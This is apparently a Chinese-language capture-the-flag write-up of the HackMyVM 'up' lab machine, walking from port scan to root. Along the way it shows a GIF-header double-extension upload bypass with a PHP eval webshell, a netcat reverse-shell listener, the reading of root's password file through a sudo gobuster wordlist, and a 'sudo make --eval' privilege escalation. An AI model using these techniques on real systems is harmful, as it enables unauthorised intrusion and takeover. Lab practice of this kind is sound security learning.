HMV-up

HMV-up靶机复盘

这个靶机还挺有意思的，有web还和之前的buster提权有点关系

端口扫描

┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.58.3 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-09 20:42 CST
Nmap scan report for bogon (192.168.58.3)
Host is up (0.054s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: RodGar - Subir Imagen
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: C8:21:58:16:CF:C4 (Intel Corporate)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop

TRACEROUTE
HOP RTT      ADDRESS
1   53.74 ms bogon (192.168.58.3)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.53 seconds

只开放了80端口，所以待会肯定是要反弹shell的

web探测

web是一个文件上传的界面，只允许jpg或者gif文件。
我这里试了很多方法，比如bp改后缀，双重后缀名等，都没有绕过。（都是ctf的常见套路）
最后是用gif文件的文件头+双后缀名绕过的

#shell.php.gif
GIF89a
<?php $eval($_POST[1]);>
```   
但是现在不知道被上传到哪里了

┌──(root㉿kakeru)-[~/tmp]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u 192.168.58.3 -x php,js,txt,jpg,png

Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url: http://192.168.58.3
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,jpg,png,php,js
[+] Timeout: 10s

Starting gobuster in directory enumeration mode

/.php (Status: 403) [Size: 277]
/index.php (Status: 200) [Size: 4489]
/uploads (Status: 301) [Size: 314] [–> http://192.168.58.3/uploads/]
/javascript (Status: 301) [Size: 317] [–> http://192.168.58.3/javascript/]
/sh.jpg (Status: 200) [Size: 1330919]
Progress: 159700 / 1245864 (12.82%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 159700 / 1245864 (12.82%)

Finished

发现有一个uploads 但是直接访问这个文件夹下刚才的文件名还是没有内容 再扫一下这个uploads文件夹下面的内容

┌──(root㉿kakeru)-[~/tmp]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u 192.168.58.3//uploads -x php,js,txt,jpg,png

Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url: http://192.168.58.3//uploads
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: js,txt,jpg,png,php
[+] Timeout: 10s

Starting gobuster in directory enumeration mode

/.php (Status: 403) [Size: 964]
/robots.txt (Status: 200) [Size: 1301]
/.php (Status: 403) [Size: 964]
Progress: 639832 / 1245864 (51.36%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 639861 / 1245864 (51.36%)

Finished

访问robots.txt得到文件上传逻辑的源码 用base64解码

┌──(root㉿kakeru)-[~/tmp]
└─# echo “PD9waHAKaWYgKCRfU0VSVkVSWydSRVFVRVNUX01FVEhPRCddID09PSAnUE9TVCcpIHsKICAgICR0YXJnZXREaXIgPSAidXBsb2Fkcy8iOwogICAgJGZpbGVOYW1lID0gYmFzZW5hbWUoJF9GSUxFU1siaW1hZ2UiXVsibmFtZSJdKTsKICAgICRmaWxlVHlwZSA9IHBhdGhpbmZvKCRmaWxlTmFtZSwgUEFUSElORk9fRVhURU5TSU9OKTsKICAgICRmaWxlQmFzZU5hbWUgPSBwYXRoaW5mbygkZmlsZU5hbWUsIFBBVEhJTkZPX0ZJTEVOQU1FKTsKCiAgICAkYWxsb3dlZFR5cGVzID0gWydqcGcnLCAnanBlZycsICdnaWYnXTsKICAgIGlmIChpbl9hcnJheShzdHJ0b2xvd2VyKCRmaWxlVHlwZSksICRhbGxvd2VkVHlwZXMpKSB7CiAgICAgICAgJGVuY3J5cHRlZEZpbGVOYW1lID0gc3RydHIoJGZpbGVCYXNlTmFtZSwgCiAgICAgICAgICAgICdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6JywgCiAgICAgICAgICAgICdOT1BRUlNUVVZXWFlaQUJDREVGR0hJSktMTW5vcHFyc3R1dnd4eXphYmNkZWZnaGlqa2xtJyk7CgogICAgICAgICRuZXdGaWxlTmFtZSA9ICRlbmNyeXB0ZWRGaWxlTmFtZSAuICIuIiAuICRmaWxlVHlwZTsKICAgICAgICAkdGFyZ2V0RmlsZVBhdGggPSAkdGFyZ2V0RGlyIC4gJG5ld0ZpbGVOYW1lOwoKICAgICAgICBpZiAobW92ZV91cGxvYWRlZF9maWxlKCRfRklMRVNbImltYWdlIl1bInRtcF9uYW1lIl0sICR0YXJnZXRGaWxlUGF0aCkpIHsKICAgICAgICAgICAgJG1lc3NhZ2UgPSAiRWwgYXJjaGl2byBzZSBoYSBzdWJpZG8gY29ycmVjdGFtZW50ZS4iOwogICAgICAgIH0gZWxzZSB7CiAgICAgICAgICAgICRtZXNzYWdlID0gIkh1Ym8gdW4gZXJyb3IgYWwgc3ViaXIgZWwgYXJjaGl2by4iOwogICAgICAgIH0KICAgIH0gZWxzZSB7CiAgICAgICAgJG1lc3NhZ2UgPSAiU29sbyBzZSBwZXJtaXRlbiBhcmNoaXZvcyBKUEcgeSBHSUYuIjsKICAgIH0KfQo/Pgo=” | base64 -d
<?php
if ($_SERVER[‘REQUEST_METHOD’] === ‘POST’) {
$targetDir = “uploads/“;
$fileName = basename($_FILES[“image”][“name”]);
$fileType = pathinfo($fileName, PATHINFO_EXTENSION);
$fileBaseName = pathinfo($fileName, PATHINFO_FILENAME);

$allowedTypes = ['jpg', 'jpeg', 'gif'];
if (in_array(strtolower($fileType), $allowedTypes)) {
    $encryptedFileName = strtr($fileBaseName, 
        'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz', 
        'NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm');

    $newFileName = $encryptedFileName . "." . $fileType;
    $targetFilePath = $targetDir . $newFileName;

    if (move_uploaded_file($_FILES["image"]["tmp_name"], $targetFilePath)) {
        $message = "El archivo se ha subido correctamente.";
    } else {
        $message = "Hubo un error al subir el archivo.";
    }
} else {
    $message = "Solo se permiten archivos JPG y GIF.";
}

}
?>

这里上传的文件夹确实是uploads/  而且用了一个加密，是一个代换密码比如我们上传的是shell.php.gif,除了最后的gif，前面的字符都会变化
变成furyy.cuc.gif,然后用蚁剑连接,在蚁剑的虚拟终端里面反弹shell
![](https://pic1.imgdb.cn/item/67cda033066befcec6e231b0.png)

┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

# 提权
## www

www-data@debian:/var/www/html/uploads$ sudo -l
Matching Defaults entries for www-data on debian:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin, use_pty

User www-data may run the following commands on debian:
(ALL) NOPASSWD: /usr/bin/gobuster

有一个gobuster的sudo权限，是不是有点似曾相识，和buster有点像啊
但是我用linpeas.sh扫了一下没有定时任务
但是在上传目录下面有一个提示文件

www-data@debian:/var/www/html/uploads$ ls
access_denied.html clue.txt furyy.cuc.gif robots.txt
www-data@debian:/var/www/html/uploads$ cat clue.txt
/root/rodgarpass

之前我们有gobuster权限的时候是用字典把指定路径的文件传个root的定时文件，让root可以执行
比如我在本机开一个http服务，有一个/tmp/b 我现在在靶机创建一个字典b.txt 里面的内容是/tmp/b 这样子这个tmp/b就可以写入到定时任务里面
因为这个定时任务是bash运行的，所以我们在靶机的/tmp/b里面写反弹shell  好了这就复习完之前的提权方法了，但是这个靶机明显不是这样的

现在提示是/root/rodgarpass，所以就是要让我们用buster看这里的内容，也很简单，也是本地开http，然后指定这个字典就可以了

┌──(root㉿kakeru)-[~/tmp]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) …

www-data@debian:/var/www/html/uploads$ sudo gobuster dir -u 192.168.58.11 -w /root/rodgarpass -v

Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url: http://192.168.58.11
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /root/rodgarpass
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Verbose: true
[+] Timeout: 10s

2025/03/09 08:14:33 Starting gobuster in directory enumeration mode

Missed: /b45cffe084dd3d20d928bee85e7b0f2 (Status: 404) [Size: 335]

2025/03/09 08:14:34 Finished

用-v显示具体信息，看到这个内容，这个是一个md5编码的字符，另一种是在本机可以看日志看到访问了什么路径
用在线的解密器解密出来时string，但是这个只有31位，正常的要有32位

用md5加密string 得到完整的是`b45cffe084dd3d20d928bee85e7b0f21` 这个就是用户的密码
## rodgar

rodgar@debian:~$ sudo -l
Matching Defaults entries for rodgar on debian:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin, use_pty

User rodgar may run the following commands on debian:
(ALL : ALL) NOPASSWD: /usr/bin/gcc, /usr/bin/make

两个指令都可以提权，这里我就用make吧，在gtofbins都可以找到payload
![](https://pic1.imgdb.cn/item/67cda2df066befcec6e23284.png)

rodgar@debian:~$ sudo make -s –eval=$’x:\n\t-‘“/bin/bash”
root@debian:/home/rodgar# id
uid=0(root) gid=0(root) grupos=0(root)

### 总结
- 又学习到一种文件上传的绕过方式
- 根目录没有信息的时候，扫描uploads目录
- gobuster的任意文件读取
- md5的长度是32位
- md5位数不一致可以用解密网站解密，然后再加密